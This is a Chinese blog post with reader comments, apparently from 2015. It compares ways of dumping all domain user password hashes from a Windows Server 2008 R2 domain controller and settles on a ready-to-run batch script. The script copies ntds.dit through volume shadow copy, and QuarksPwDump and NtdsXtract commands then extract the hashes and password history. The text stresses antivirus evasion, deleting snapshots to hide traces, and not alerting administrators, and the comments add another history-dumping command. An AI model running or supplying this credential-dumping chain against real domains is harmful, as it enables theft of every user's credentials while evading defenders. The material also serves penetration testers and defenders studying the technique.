导出当前域内所有用户hash的技术整理


0x00目标:


导出当前域内所有用户的hash

0x01测试环境:


域控:server2008 r2
杀毒软件:已安装*
域控权限:可使用net use远程登陆,不使用3389

0x02测试方法:


(1)mimikatz:

hash数量:只能抓取登陆过的用户hash,无法抓取所有用户
免杀:需要免杀

(2)pwdump:

hash数量:无法抓取所有用户
免杀:需要免杀

(3)vssown.vbs + libesedb + NtdsXtract

hash数量:所有用户
免杀:不需要
优点:
    获得信息很全面,可获得以下信息:
    Record ID
    User name
    User principal name
    SAM Account name
    SAM Account type
    GUID
    SID
    When created
    When changed
    Account expires
    Password last set
    Last logon
    Last logon timestamp
    Bad password time
    Logon count
    Bad password count
    User Account Control
    Ancestors
    Password hashes
    Password history
    Supplemental credentials
    Member of

缺点:
    vssown.vbs使用后需要删除快照清理痕迹
    vssown.vbs偶尔会报错
    数据库巨大,下载回本地很麻烦
    libesedb + NtdsXtract环境搭建麻烦,目前网上中文的教程存在一些错误,下载链接也已失效,需要自行摸索
    用vssown.vbs复制出来的ntds.dit数据库无法使用QuarksPwDump.exe读取       

Tips:
libesedb + NtdsXtract环境搭建的一点提示:

(download libesedb)
https://github.com/libyal/libesedb/releases/download/20150409/libesedb-experimental-20150409.tar.gz
tar zxvf libesedb-experimental-20150409.tar.gz
cd libesedb-20150409
./configure
make
cd esedbtools/
./esedbexport
(copy ntds.dit to ~/libesedb-20150409/esedbtools)
./esedbexport ./ntds.dit
(wait...)
mv ntds.dit.export/ ../../
download ntdsxtract
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
unzip ntdsxtract_v1_0.zip
cd NTDSXtract 1.0/
(move SYSTEM to '/root/SYSTEM')
(get passwordhashes )
python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes '/root/SYSTEM'

(4)ntdsutil.exe + QuarksPwDump.exe

hash数量:所有用户 
免杀:QuarksPwDump.exe需要免杀 
优点: 
    获得信息很全面 QuarksPwDump.exe可在windows下使用,读取hash值的操作简便快捷
缺点: 
    ntdsutil.exe使用后需要删除快照清理痕迹 ntdsutil.exe偶尔会报错 巨大的数据库,QuarksPwDump.exe读取偶尔会报错 server2003的shell下无法使用

0x03实际测试:


  • gethashes.exe:没有源码,忽略
  • mimikatz:无法抓出所有用户hash,本机管理员口令也无法导出
  • pwdump:抓取数量不足
  • vssown.vbs + libesedb + NtdsXtract:成功,耗时3天+
  • ntdsutil.exe + QuarksPwDump.exe:ntdsutil.exe报错,失败

0x04分析:


5种方法唯一成功的是vssown.vbs + libesedb + NtdsXtract,但是耗时太久,操作麻烦,下载数据库容易暴露,vssown.vbs备份的信息容易被管理员发现

其他方法中可取的地方:vssown.vbs复制数据库的方法很是巧妙,但存在一些不足,配合域控的at命令执行较为麻烦;QuarksPwDump.exe可在windows下直接使用,免去读取数据库的等待,并且QuarksPwDump可获得源码,能够配合实际使用做修改。

那么大胆设想一下:如果使用QuarksPwDump.exe在域控上直接读取ntds.dit岂不是最好

0x05改进:


(1)分析vssown.vbs的复制办法,找到一种更好的解决办法,改用ShadowCopy实现ntds.dit的复制 (2)对QuarksPwDump的改造,实现命令行下的自动读取及导出信息


Tips:

ShadowCopy 是一款增强型的免费文件复制工具,由于使用了微软卷影副本(`Volume Shadow Copy`)技术,它能够复制被锁定的文件或者被其他程序打开的文件,

因此只要是硬盘的上的文件,即使正被程序占用,`ShadowCopy` 都可以拷贝出来。

0x06最终方案:


(1)使用ShadowCopy的命令行版,编写bat实现拷贝ntds.dit至当前目录

setlocal
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
set SOURCE_DRIVE_LETTER=%SystemDrive%
set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
set DESTINATION_PATH=%~dp0
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
"%~dp0vsshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

参考链接: http://blogs.msdn.com/b/adioltean/archive/2005/01/05/346793.aspx

(2)使用QuarksPwDump直接读取信息并将结果导出至文件,先执行

esentutl /p /o ntds.dit

修复复制出来的数据库

QuarksPwDump.exe -dhb -hist -nt ntds.dit -o log.txt

读取并导出。

注:实际使用时ntds.dit和log.txt需要加绝对路径


Tips:

QuarksPwDump.exeDump various types of Windows credentials without injecting in any process.
源码下载链接,vs2010直接编译即可
https://github.com/quarkslab/quarkspwdump

0x07小结:


ShadowCopy+QuarksPwDump:

hash数量:所有用户
免杀:不需要
优点:
    获得信息全面
    bat一键搞定,简单高效
    无需下载ntds.dit,隐蔽性高

评论

三好学生 2015-07-03 17:56:03

@debug
QuarksPwDump确实还有修改提升空间,配合实际需要修改源码就好

三好学生 2015-07-03 18:04:03

@mickey 感谢提供参考资料,期末考试我要得100分

喵喵爱吃鱼 2015-07-06 09:03:01

楼主没有测试神器gsecdump呢,可以到处2008所有用户的HASH。貌似2012就不可以了。

_

_Evil 2015-07-06 09:37:26

@mickey m老湿 文章里面可以所获取账号的历史密码(他说上限是20次内)。 有啥方法?

三好学生 2015-07-06 09:57:47

@_Evil
可以用NtdsXtract:
python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes '/root/SYSTEM' --passwordhistory '/root/SYSTEM'

浮生 2015-07-07 19:51:41

最后方案也是需要 QuarksPwDump.exe免杀的

浮生 2015-07-07 19:53:07

@喵喵爱吃鱼
gsecdump杀的有点厉害,需要免杀的

三好学生 2015-07-08 08:16:33

@浮生 @喵喵爱吃鱼
gsecdump没有源码,免杀比较麻烦,所以就没考虑
QuarksPwDump有源码,免杀相对容易很多

2015-11-26 23:44:03

给楼主一个提示:VSHADOW

0

0x70 2016-05-06 15:13:21

+] Parsing datatable...Fatal error: not enough memory!
爆这个错误是怎么回事?怎么解决

三好学生 2016-05-06 15:18:47

@0x70 https://github.com/quarkslab/quarkspwdump/pull/3

0

0x70 2016-05-06 20:54:25

@三好学生
[+] SYSKEY restrieving...[OK]
SYSKEY = 4A5DB246C825E2568509D58340D30DB8
[+] Init JET engine...OK
[+] Open Database c:\Users\2015000\Desktop\ntds.dit...ERROR : JetOpenDatabase() failed with JET_ERR = -602
Details : JET_errUnicodeTranslationFail, Unicode normalization failed
[!] NTDS_OpenDatabase failed!
求教,这又是什么鬼

路人甲 2016-06-21 15:17:36

@三好学生
ERROR: COM call "m_pVssObject->InitializeForBackup()" failed.
- Returned HRESULT = 0x80042302
- Error text: <Unknown error code>
- Please re-run VSHADOW.EXE with the /tracing option to get more details
shadcopy报这样的错是为什么

三好学生

good in study,attitude and health

twitter weibo github wechat

随机分类

XSS 文章:34 篇
网络协议 文章:18 篇
企业安全 文章:40 篇
其他 文章:95 篇
前端安全 文章:29 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录